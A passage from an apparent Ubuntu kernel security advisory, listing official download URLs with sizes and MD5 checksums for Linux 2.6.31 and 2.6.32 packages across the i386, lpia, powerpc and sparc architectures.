152a8cf38c19823497507b9f3663df86\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    86104 cf1457aa150576d327043920a45cff27\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    46424 b2baacb7c5ffe63175430863e7d6878e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:     8918 9b41564f8be9827daa0254d9308ea154\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    36282 291e645259303b5c8802e64740569845\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    21668 467a00b25bb160d9e117fc910f31784a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:  1495340 ac8a383261c23880b7f2f98dc9ca0f97\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    44088 12d57d9e5921a6694e98f72cd661a89f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    48548 06ffbb6a1b5d63dd5187dc4c96d81004\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:   117862 334d8feda1b33280c0c767eb59fc8941\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb\n      Size/MD5:    14532 28a556e15bd25cacb435f06bc40de557\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   198816 cabad71083cee31770876846c9b3e5f0\n    http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    32446 6aff2bbc6e25c9ed6dfe471c79f9e63e\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    49948 a322353219ca799650b5726a6c06b1d6\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    42156 bb1c584d16c683ad60b94886115201bc\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    45934 ce7abfdde991057d5de236cc7c92dd06\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    87392 5a3de6c8b7e9f7789d180572b09dc2ff\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    33758 73cb370ad891451b4d0bc88705010ae2\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   534312 6deae522a3c870b57491d1da33d886bd\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   128220 9301688d4020d499ed969748cb732bdc\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    49750 c3fc2a64a7415c42a60be5284785ac0c\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   295734 7b6c3dfa99d318e9202a33348b0b7f40\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:  4197456 d122014f54ef4ab940dc19ec321d6286\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-lpia_2.6.31-22.60_lpia.deb\n      Size/MD5:   684840 c139f2a52780e291cc978594db715c14\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-lpia_2.6.31-22.60_lpia.deb\n      Size/MD5: 28892608 4bf6a29734b5aa254ca96d4c0f26ff29\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_lpia.deb\n      Size/MD5:   753444 9e4b00e5d9f5a894ba2e088c3d15e280\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   172932 8478bc14f1f14a05a4e93b2356428c29\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   186154 49c9a729f5b7cd5f127d8f45437dd162\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    28912 267006f0a11aaf673cf8f3b3f3abaeb5\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   292858 7761b4f00c9257ce5b7873d76f1c5ea4\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:  2400346 e2ab63a68d1afb4b84de59722af76fad\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   141982 32b0be2ea446d44c0796ead47f311aed\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   189584 29474120e1018740d2cedd3c560d0c1f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   148528 8a3914c5c04e9967f99d5b71f0630c22\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    35292 fc88bbd3fd4ada2002bdbb7dda4784bf\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:     6828 495fe0c7945276ad8055ff66aef0c870\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    86098 309c17f97610d6901a49ec7deee22282\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    46412 3a56ab298ad69fa20a59243dc90d91b3\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:     8900 dbb82fccbacffd5147b0a4ba42e73fb0\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    36270 f275023b9b741f5383a4adcb3c20d8fc\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    21666 a10e2c6899f03445dc3fd431b04e389b\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:  1495072 a60482e79efeafe8f7c5544b7aac4d25\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    44064 c5c8d43cdfedaf45b3bcb0ad5cebcf5e\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    48540 a81308e2c1a4e85467c70dc11586a35e\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:   117832 0fdbb4919cd2f93e13304a484a76b890\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb\n      Size/MD5:    14516 f87cbe777565bffc6791d917445a8ed2\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   321492 a6e3955497936e2d8d21d663f79217a8\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   263650 c39b24ef95a57138b0c8c29d8ebd1db1\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    58862 623da2e39d70d011def84a9876f404f7\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    67046 b7ef32e1debe5e3897b29bf892a205a3\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    45932 ad59fb0a080fbd3f0c54c489fc1a2b41\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    51298 255d5493db43cfcb76868955f47e11a6\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    90698 549cbf218bbe9b9ca431c42995dd0895\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   105162 f4a5cdf80fdb0d8b50b66266e2a67600\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    39486 1cc5b805673f1e8ca877d80199bd35be\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    39270 c80c6ee3f07888fa3c6f3c6147bf9a9c\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   581030 48870bec4d7c78fbc4d447935a7fed0a\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   626342 71f4768f5551e771ab87f2621da8097b\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   149306 ce090bfc2dd1317de4d461e605d74101\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   147320 b3947ba223bd39bce44748fb8a737100\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    79708 998771d5afc49f155a7a028446f0386a\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    84132 677a36642f9fa2d4ac4876e7c4c8588e\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   402940 f38251cc951d684a5052d3765152fdac\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   342490 bbb42db83979db7bddad061bd10c19a3\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:  3838604 3dc50a2b64f2864947576cfdb07c8ccd\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:  5223500 d454911ee6879d2a8e3e09ef756525a0\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-powerpc-smp_2.6.31-22.60_powerpc.deb\n      Size/MD5:   795016 dc961bb4deb5e0f7cc8594d3b42fcccd\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-powerpc64-smp_2.6.31-22.60_powerpc.deb\n      Size/MD5:   813182 cfdf6137c9db4ff068f8377641a6f994\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-powerpc_2.6.31-22.60_powerpc.deb\n      Size/MD5:   794466 7098cc192d736432f69d6461b6b2f1e5\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-powerpc-smp_2.6.31-22.60_powerpc.deb\n      Size/MD5: 24881134 d3a7996bfa4ca9d00ffa138e8af07a65\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-powerpc64-smp_2.6.31-22.60_powerpc.deb\n      Size/MD5: 25859358 1896b217a23fecdef7fa4f4108b5a39d\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-powerpc_2.6.31-22.60_powerpc.deb\n      Size/MD5: 24711328 090a1826d0b29376957bd285a00bec55\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_powerpc.deb\n      Size/MD5:   738524 6a069b9d476c1302d17b59b97d9f5fef\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   272172 ed7a1d4d22a74235e0e945cd00618b3b\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   294756 b0fda03144d279b6d8c11ba4a151ff0b\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   210594 c2dbac3b914f766e9eef15e760579805\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   217030 6f3106804d19966c219d7f3ef60e7ec0\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    26370 4918a8a9b630381d08931f36e98a6ba3\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    29680 dbf2a64751a6b805c38a2671588cd55b\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   315082 c4cc05ae803543c34dbc5b84bb506fc6\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   357610 169b16c940142485d187019ae62dfba3\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:  2027744 72cac22305c06de13610f3e4cb732000\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:  2247756 eeac477bd4452047bd4e054438ce5ae1\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   213540 539abf10cc8075cff2aaeb7a5d2a4415\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   209828 07bf91d64a9c1ca41d847d1d45145859\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   210294 d03b6378e07b7d16a8060805d5a33a1e\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   244890 35b7664b5b7866124f07498565492550\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   111850 76a16b3ec983c1456a847b74b058c84d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   131634 42b2955a56db91a6734e79fabe4b6eb7\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    49036 9f95af70a86ea344deb82828097f33ac\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    44086 d8d27fda02b3a2eccd1bb295513b0ae2\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:     5848 ca06ac8de8f328c81d274625018c28dc\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:     6510 19263161420a4414cca39b3e176ed1fe\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    79130 f9547fa7a009cfc1fdace53f207e66e0\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    85236 783f47a75d9e82f999273ae34ecb2bad\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    74332 09ced5601534f6721803bc936d4474a6\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    27270 8fca637189a591b726e81d9f759de81e\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:     8542 5e50b93423cef9abfa0e1224b0706042\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:     9816 645a211d3b5072ddfd2494355f612081\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    58820 d1e640be1163d46f9c4d30f16bc5d489\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    70146 df3e05fd190bbdee466474050abf6d4d\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    23716 df0ec1c32f484026626eba3aceee8bd0\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    30798 d34084fae6d01f175c520a7ee88ae885\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:  1557496 8b2c2babeeb812ff28154713e33b68fc\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:  1509500 140ca736b92247392b5f7a81c6112824\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    81652 2f7f7e13c32879ede7d9444b7d0d82c1\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    88506 eb5516ed210ea0daef38e35a63497716\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    64574 93994b13239fa750556d18cc981ead23\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:    77178 88f35d2608a8c3e187ffddbc1d1249cc\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   141566 1705c06d42087933e0bc8078790c00d1\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb\n      Size/MD5:   151400 5a4f2e223dd56b134c2a1bd52a5fdab6\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   139446 c7baab61c8a09b5ebef664ba84316425\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:    70116 cbc95ad9771e8414cdf22bc424b7e257\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:    46514 6cd9a6fed2a5aae88598be99e139952a\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:    93986 5eac60dfd4283e77a7ced7e36f4bda4c\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   588776 425ae2acd1afcbeff7468ea90c778300\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   148400 5cf7b0187e50f5c17a0a951650ad19ff\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:    75882 089f804226b3cac5e0f007704b5fbc3e\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:  2915232 bdb3bc98fccde0f109a49486b8f4fd79\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-sparc64-smp_2.6.31-22.60_sparc.deb\n      Size/MD5:   612074 601db402e4c301ea1f3c7838655e4bf2\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-22-sparc64_2.6.31-22.60_sparc.deb\n      Size/MD5:   611672 5611adee164ba7997a9dc6a35cc03919\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-sparc64-smp_2.6.31-22.60_sparc.deb\n      Size/MD5: 20554024 4ad3050a3a26f3470c2df6cf32ea12a2\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-sparc64_2.6.31-22.60_sparc.deb\n      Size/MD5: 20242858 42fa813a7d01a6864dc27d8b5602afee\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_sparc.deb\n      Size/MD5:   750612 8957e1fb11e133d1e6c056ae25fb1921\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   266438 128f34223118495af4a21daf6fbf9099\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   209154 a2f428054c4405bb238d2be5dc54ce17\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:    26792 1ca186e1ac28aa3aff15bdd6060d07bd\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   314212 212236bfb1dc174322ca6e9f277de47b\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:  1675454 da2055579d886793a3ff4c0118f451d6\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   222868 bedf62d04baa61688881e77c64fa7c15\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   121974 b1b8381f0c79f3b6466d6baf71446f08\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:    38796 e04e8345ec4eab7514fb38c751d561c6\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   100826 39ba938bb7bd38eeb830b1a3d75e2155\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:     8928 18206a9f5a2a84dcdc7bab536d389156\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:    62912 c16890ee3c8ad593ce2ca0d60bf55194\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   120986 0f766f53e118900c8cc33fbb7ec591f2\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:  1218150 17f468abbea9fb86f77c5bad73c3a73e\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   101542 02cf5f3466caf54628bfadfabbdb86d6\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   200226 5cd4a933a0218730a5906011c5bc031d\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb\n      Size/MD5:   185114 af6cfb5ab8a3e15eac5005f1c78d2507\n\nUpdated packages for Ubuntu 10.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.32-306.11.diff.gz\n      Size/MD5:  8482468 87193041e67aa771132606051612da46\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.32-306.11.dsc\n      Size/MD5:     1502 cf51bda52f14984a1c3913d585b94dcd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.32.orig.tar.gz\n      Size/MD5: 81900940 4b1f6f6fac43a23e783079db589fc7e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-608.14.diff.gz\n      Size/MD5:  5383378 def0a5c447ec67f86d849bb83fb8d2fa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-608.14.dsc\n      Size/MD5:     2180 a4fdcf52dbda79869b8dc1a9b0d41fe8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.32-205.18.diff.gz\n      Size/MD5:  6748240 2a5a075f68fceef9902a1e194463ed25\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.32-205.18.dsc\n      Size/MD5:     1464 6d6a8254b60e8244b1f96b4d85d6687e\n    